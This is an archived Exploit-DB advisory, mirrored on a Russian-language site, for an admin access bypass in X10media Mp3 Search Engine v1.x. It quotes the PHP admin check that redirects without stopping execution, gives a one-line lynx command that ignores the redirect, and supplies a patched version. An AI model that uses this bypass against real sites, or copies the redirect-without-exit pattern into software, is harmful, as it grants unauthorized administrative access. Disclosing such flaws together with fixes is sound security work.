- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8408
- Проверка EDB
-
- Пройдено
- Автор
- THUNDER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-04-13
Код:
################# ~THUNDER ################################################################
~Product: X10media Mp3 Search Engine v1.x Admin Access Vulnerability
~Author : THUNDER <t4h[at]hotmail.fr>
~File : admin/admin.php
##### ~Vulnerable Code ############################################################################
/**
* User not an administrator, redirect to main page
* automatically.
*/
if(!$session->isAdmin()){
header("Location: ../main.php");
}
else{
/**
* Administrator is viewing page, so display all
* forms.
*/
}
----------------------------------------
if the user is not admin redirect it to main.php, so we can exploit it using lynx by disabling redirection.
##### ~Exploit ############################################################################
lynx -noredir http://www.vulnerable.com/admin/admin.php
allow the cookies, and you're in admin panel.
##### ~Solution ############################################################################
Open admin/admin.php
1- find:
/**
* User not an administrator, redirect to main page
* automatically.
*/
if(!$session->isAdmin()){
header("Location: ../main.php");
}
else{
/**
* Administrator is viewing page, so display all
* forms.
*/
}
2- Replace it with:
/**
* User not an administrator, show error 404
*/
if(!$session->isAdmin()){
die(header("HTTP/1.1 404 Not Found"));
}
###########################################################################################
# milw0rm.com [2009-04-13]- Источник
- www.exploit-db.com
